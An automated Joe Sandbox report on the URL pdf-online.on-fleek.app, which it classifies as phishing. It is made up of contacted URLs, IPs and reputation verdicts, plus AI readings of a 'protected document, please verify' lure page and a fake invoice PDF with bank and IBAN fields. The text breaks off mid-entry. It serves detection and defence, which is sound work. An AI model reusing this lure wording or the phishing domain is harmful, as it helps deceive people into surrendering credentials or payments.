https://www.tomsher.com/assets/imgs/shape/22.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/js/jquery-3.6.0.min.js0%Avira URL Cloudsafe
https://www.tomsher.com/erp-integration0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/56/44d739a3dc26606dec5eb5ca88f44a23.jpg0%Avira URL Cloudsafe
https://www.tomsher.com/fresha-business-account-setup0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/service/website_development.png0%Avira URL Cloudsafe
https://www.tomsher.com/content-writing-company0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/images/captcha.jpg0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/webfonts/fa-brands-400.woff20%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/email.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/meta.png0%Avira URL Cloudsafe
https://www.tomsher.com/google-ads-ppc-campaigns0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/42/127f314bccd9badeb03578047c9cb10a.jpg0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/dynamic/12/e14e9190beffdec276a88b4d487cd9ab.webp0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/news/7/37084e21a1e397964e863e3221dbb8f2.jpg0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/menu3.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/home/website.png0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/15/6c129810768a62552c68ec890060bf78.jpg0%Avira URL Cloudsafe
https://www.youtube.com/s/player/b0557ce3/www-embed-player.vflset/www-embed-player.js0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/portfolio/malabar.webp0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/custom-web.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/logos/8.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/woocommerce.png0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/30/52a16fee16be4cc11cc072eda9411226.jpg0%Avira URL Cloudsafe
https://i.ytimg.com/vi/xFzWNmILl40/sddefault.jpg0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/dynamic/6/d1cf623cfda2ed689fc6281afcfa75de.webp0%Avira URL Cloudsafe
https://www.tomsher.com/ebrochure-design0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/business-partner.webp0%Avira URL Cloudsafe
https://angular.dev/license0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/logos/his-logo-blue.png0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/projects/6/f8dd4bffdef039afd52cc92797706540.webp0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/home/web-hosting.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/clients/cdc.png0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/41/9a425284a8782bb86f821fa481605497.jpg0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/31/707eac7627727f1d32ffd41fb4f47eee.jpg0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/39/b98bea2f5aa38986a63def4cfb9af12e.jpg0%Avira URL Cloudsafe
https://www.tomsher.com/squarespace-website-development0%Avira URL Cloudsafe
https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
https://css-tricks-post-videos.s3.us-east-1.amazonaws.com/blurry-trees.mov0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/73/f7d9e3f0ec916b964874a8af689c6f7a.jpg0%Avira URL Cloudsafe
https://www.tomsher.com/employee-overtime-management-system0%Avira URL Cloudsafe
https://www.tomsher.com/web-design-development0%Avira URL Cloudsafe
https://search.google.com/local/reviews?placeid=ChIJ1zHpqo1pXz4Rj5vQ0N8i31A0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/4/ed0c80b1db009dd23b3c0d61985ff1a0.jpg0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
162.159.61.3
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      i.ytimg.com
      142.250.185.246
      truefalse
        unknown
        tomsher.com
        173.231.208.7
        truefalse
          unknown
          citydiamondcontracting.com
          173.231.215.118
          truefalse
            unknown
            static.doubleclick.net
            172.217.16.198
            truefalse
              unknown
              stats.g.doubleclick.net
              74.125.133.156
              truefalse
                unknown
                youtube-ui.l.google.com
                216.58.206.78
                truefalse
                  unknown
                  analytics-alv.google.com
                  216.239.32.181
                  truefalse
                    unknown
                    googleads.g.doubleclick.net
                    142.250.185.98
                    truefalse
                      unknown
                      play.google.com
                      172.217.18.14
                      truefalse
                        unknown
                        cdnjs.cloudflare.com
                        104.17.25.14
                        truefalse
                          unknown
                          photos-ugc.l.googleusercontent.com
                          172.217.16.193
                          truefalse
                            unknown
                            www.google.com
                            172.217.16.132
                            truefalse
                              unknown
                              td.doubleclick.net
                              142.250.185.162
                              truefalse
                                unknown
                                pdf-online.on-fleek.app
                                104.26.13.141
                                truetrue
                                  unknown
                                  yt3.ggpht.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    x1.i.lencr.org
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.citydiamondcontracting.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        analytics.google.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.youtube.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.tomsher.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              https://www.tomsher.com/assets/imgs/logos/25.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/logos/17.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/projects/11/dc8d49617e8c915bd5328fa315b82453.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/services/5/6b7430e47711776a692abe259b42d33c.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/logo.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/maps/vt?pb=!1m4!1m3!1i15!2i21415!3i14013!1m4!1m3!1i15!2i21414!3i14014!1m4!1m3!1i15!2i21415!3i14014!2m3!1e0!2sm!3i707457653!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e3!12m1!5b1!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=3619false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/certifications/3/b28c762ff89177dacd4852c7b909ca34.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/7/5e07aca7ac8c83df08eeb434753dbfeb.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://i.ytimg.com/vi/hOPpxvP2E28/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgWyhIMA8=&rs=AOn4CLB1pwsAn0qkJuzQscocunfjgcf4QAfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/blogger.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/js/ScrollTrigger.min.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/js/chroma.min.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/25/fd44eb6a5f7ee9bdeaaf121d22595ebe.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/images/logo1.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/dynamic/19/8c31bd6a7e31516d9af11ddd76cf1f8b.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21412!3i14013!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=82046false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://tomsher.com/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/logow.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/logos/7.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d7220.8946438946405!2d55.258405!3d25.188133!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x50df22dfd0d09b8f!2sCity%20Diamond%20Contracting%20LLC!5e0!3m2!1sen!2sus!4v1663058383351!5m2!1sen!2susfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://pdf-online.on-fleek.app/styles.csstrue
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/vps.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/squarespace.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.youtube.com/s/player/b0557ce3/player_ias.vflset/en_US/embed.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/smm.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.youtube.com/s/player/b0557ce3/player_ias.vflset/en_US/remote.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/api.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/projects/23/c7a29cc2e7fdcacc9c3f5f4ff3bddd5f.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/amazon.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/oil-barrel.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/js/jquery-3.6.0.min.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/shape/22.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://i.ytimg.com/vi_webp/Jo_coLYPcOQ/sddefault.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/56/44d739a3dc26606dec5eb5ca88f44a23.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/service/website_development.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/images/captcha.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/news/7/37084e21a1e397964e863e3221dbb8f2.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/email.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/webfonts/fa-brands-400.woff2false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/dynamic/12/e14e9190beffdec276a88b4d487cd9ab.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/meta.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/42/127f314bccd9badeb03578047c9cb10a.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/menu3.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/15/6c129810768a62552c68ec890060bf78.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.youtube.com/s/player/b0557ce3/www-embed-player.vflset/www-embed-player.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://i.ytimg.com/vi/xFzWNmILl40/sddefault.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/portfolio/malabar.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/30/52a16fee16be4cc11cc072eda9411226.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/woocommerce.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/menu/custom-web.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/logos/8.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/business-partner.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/dynamic/6/d1cf623cfda2ed689fc6281afcfa75de.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/logos/his-logo-blue.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/images/clients/cdc.pngfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.cssfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/projects/6/f8dd4bffdef039afd52cc92797706540.webpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/41/9a425284a8782bb86f821fa481605497.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/31/707eac7627727f1d32ffd41fb4f47eee.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/39/b98bea2f5aa38986a63def4cfb9af12e.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/4/ed0c80b1db009dd23b3c0d61985ff1a0.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/recaptcha/api.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.citydiamondcontracting.com/uploads/partners/73/f7d9e3f0ec916b964874a8af689c6f7a.jpgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://www.tomsher.com/social-media-marketingchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/react-native-hybrid-mobile-application-developmentchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://g.co/dev/maps-no-accountchromecache_863.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://alizahid.github.io/jquery-sliding-menu/chromecache_880.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ampcid.google.com/v1/publisher:getClientIdchromecache_917.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://swiperjs.comchromecache_986.2.dr, chromecache_922.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://127.0.0.1:5500/service-details.htmlchromecache_971.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://github.com/twbs/bootstrap/graphs/contributors)chromecache_941.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://support.google.com/recaptcha/#6175971chromecache_686.2.dr, chromecache_694.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.tomsher.com/travel-portal-developmentchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/portfoliochromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://developers.google.com/maps/documentation/javascript/styling#cloud_toolingchromecache_863.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://assets10.lottiefiles.com/packages/lf20_wd6xyqkx.jsonchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://support.google.com/recaptchachromecache_694.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://support.google.com/fusiontables/answer/9185417).chromecache_863.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://developers.google.com/maps/deprecationschromecache_863.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.youtube.com/generate_204?cpn=chromecache_1244.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/waste-oil-management-systemchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/student-learning-management-systemchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/fresha-business-account-setupchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/erp-integrationchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/content-writing-companychromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.opensource.org/licenses/mit-license.php)chromecache_880.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.tomsher.com/google-ads-ppc-campaignschromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/home/website.pngchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/ebrochure-designchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browserschromecache_863.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://angular.dev/licensechromecache_1244.2.dr, chromecache_626.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/assets/imgs/home/web-hosting.pngchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cloud.google.com/contactchromecache_686.2.dr, chromecache_694.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://developers.google.com/maps/documentation/javascript/librarieschromecache_863.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://youtu.be/chromecache_1244.2.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.tomsher.com/squarespace-website-developmentchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://css-tricks-post-videos.s3.us-east-1.amazonaws.com/blurry-trees.movchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/employee-overtime-management-systemchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.tomsher.com/web-design-developmentchromecache_1227.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://search.google.com/local/reviews?placeid=ChIJ1zHpqo1pXz4Rj5vQ0N8i31Achromecache_900.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.159.61.3
                                              chrome.cloudflare-dns.comUnited States
                                              13335CLOUDFLARENETUSfalse
                                              104.26.13.141
                                              pdf-online.on-fleek.appUnited States
                                              13335CLOUDFLARENETUStrue
                                              142.250.184.226
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              35.190.80.1
                                              a.nel.cloudflare.comUnited States
                                              15169GOOGLEUSfalse
                                              142.250.184.228
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              173.231.215.118
                                              citydiamondcontracting.comUnited States
                                              54641INMOTI-1USfalse
                                              142.250.184.196
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              216.239.32.181
                                              analytics-alv.google.comUnited States
                                              15169GOOGLEUSfalse
                                              239.255.255.250
                                              unknownReserved
                                              unknownunknownfalse
                                              172.217.23.100
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              172.217.16.193
                                              photos-ugc.l.googleusercontent.comUnited States
                                              15169GOOGLEUSfalse
                                              104.17.25.14
                                              cdnjs.cloudflare.comUnited States
                                              13335CLOUDFLARENETUSfalse
                                              172.217.16.198
                                              static.doubleclick.netUnited States
                                              15169GOOGLEUSfalse
                                              74.125.133.156
                                              stats.g.doubleclick.netUnited States
                                              15169GOOGLEUSfalse
                                              172.217.18.14
                                              play.google.comUnited States
                                              15169GOOGLEUSfalse
                                              216.58.206.78
                                              youtube-ui.l.google.comUnited States
                                              15169GOOGLEUSfalse
                                              216.58.206.36
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              142.250.185.246
                                              i.ytimg.comUnited States
                                              15169GOOGLEUSfalse
                                              142.250.185.162
                                              td.doubleclick.netUnited States
                                              15169GOOGLEUSfalse
                                              142.250.186.132
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              142.250.184.206
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              142.250.186.134
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              173.231.208.7
                                              tomsher.comUnited States
                                              54641INMOTI-1USfalse
                                              216.58.206.68
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              172.217.16.132
                                              www.google.comUnited States
                                              15169GOOGLEUSfalse
                                              142.250.185.97
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              142.250.185.98
                                              googleads.g.doubleclick.netUnited States
                                              15169GOOGLEUSfalse
                                              IP
                                              192.168.2.8
                                              192.168.2.7
                                              192.168.2.4
                                              192.168.2.5
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1520326
                                              Start date and time:2024-09-27 08:16:58 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 28s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:browseurl.jbs
                                              Sample URL:https://pdf-online.on-fleek.app/
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal72.phis.win@80/1271@68/31
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found PDF document
                                              • Browse: https://www.citydiamondcontracting.com/about
                                              • Browse: https://www.citydiamondcontracting.com/certifications
                                              • Browse: https://www.citydiamondcontracting.com/projects
                                              • Browse: https://www.citydiamondcontracting.com/news
                                              • Browse: https://www.citydiamondcontracting.com/services
                                              • Browse: https://www.citydiamondcontracting.com/video
                                              • Close Viewer
                                              • Browse: https://tomsher.com/
                                              • Browse: https://www.citydiamondcontracting.com/contact#sec1
                                              • Browse: https://www.citydiamondcontracting.com/clients
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 172.217.16.195, 64.233.184.84, 142.250.186.110, 34.104.35.123, 142.250.184.202, 142.250.185.138, 142.250.185.202, 142.250.186.170, 142.250.184.234, 142.250.185.74, 142.250.186.138, 142.250.186.74, 142.250.185.106, 142.250.185.234, 172.217.23.106, 216.58.206.42, 172.217.18.106, 142.250.181.234, 142.250.74.202, 142.250.185.170, 142.250.185.67, 172.217.16.131, 199.232.210.172, 192.229.221.95, 142.250.184.227, 184.28.88.176, 52.5.13.197, 23.22.254.206, 54.227.187.23, 52.202.204.11, 2.19.126.143, 2.19.126.149, 2.23.197.184, 95.101.148.135, 23.47.168.24, 74.125.133.84, 142.250.186.78, 216.58.212.131, 142.250.65.202, 142.251.32.106, 142.250.80.106, 142.251.41.10, 142.250.81.234, 142.250.80.74, 142.250.176.202, 142.251.40.234, 142.250.80.42, 142.251.35.170, 142.250.65.234, 172.217.165.138, 142.251.40.202, 142.250.65.170, 142.251.40.138, 142.251.40.106, 172.217.16.138, 216.58.206.74, 172.217.18.10, 172.217.16.202, 142.250.186.106, 142.250.186.42, 142.250.185.99, 216.58.212.170
                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, maps.googleapis.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, www.googletagmanager.com, a122.dscd.akamai.net, update.googleapis.com, www.gstatic.com, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, www.google-analytics.com, clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, acroipm2.adobe.com.edgesuite.net, ajax.googleapis.com, ctldl.windowsupdate.com, p13n.adobe.io, jnn-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com, maps.gstatic.com
                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing network information.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: https://pdf-online.on-fleek.app/
                                              TimeTypeDescription
                                              02:19:26API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                              InputOutput
                                              URL: https://pdf-online.on-fleek.app/ Model: jbxai
                                              {
                                              "brand":["PDF Online"],
                                              "contains_trigger_text":true,
                                              "trigger_text":"This is a protected document,
                                               please verify to access",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["unknown"],
                                              "pdf_icon_visible":true,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://pdf-online.on-fleek.app/ Model: jbxai
                                              {
                                              "brand":["PDF Online"],
                                              "contains_trigger_text":true,
                                              "trigger_text":"This is a protected document,
                                               please verify to access",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["I'm not a robot"],
                                              "pdf_icon_visible":true,
                                              "has_visible_captcha":true,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://pdf-online.on-fleek.app/ Model: jbxai
                                              {
                                              "brand":["reCAPTCHA"],
                                              "contains_trigger_text":true,
                                              "trigger_text":"this is a protected document,
                                               please verify to access",
                                              "prominent_button_name":"i'm not a robot",
                                              "text_input_field_labels":["reCAPTCHA"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":true,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/contact Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting LLC"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"Let's Discuss",
                                              "text_input_field_labels":["Contact Details",
                                              "Our Office",
                                              "Working Hours"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: file:///C:/Users/user/Downloads/downloaded.pdf Model: jbxai
                                              {
                                              "brand":["faham doors"],
                                              "contains_trigger_text":true,
                                              "trigger_text":"click here to view document",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["bank name",
                                              "account name",
                                              "account no",
                                              "iban no",
                                              "swift code",
                                              "amount to be paid",
                                              "total due",
                                              "buyer",
                                              "seller"],
                                              "pdf_icon_visible":true,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://pdf-online.on-fleek.app/ Model: jbxai
                                              {
                                              "phishing_score":9,
                                              "brands":"reCAPTCHA",
                                              "legit_domain":"recaptcha.net",
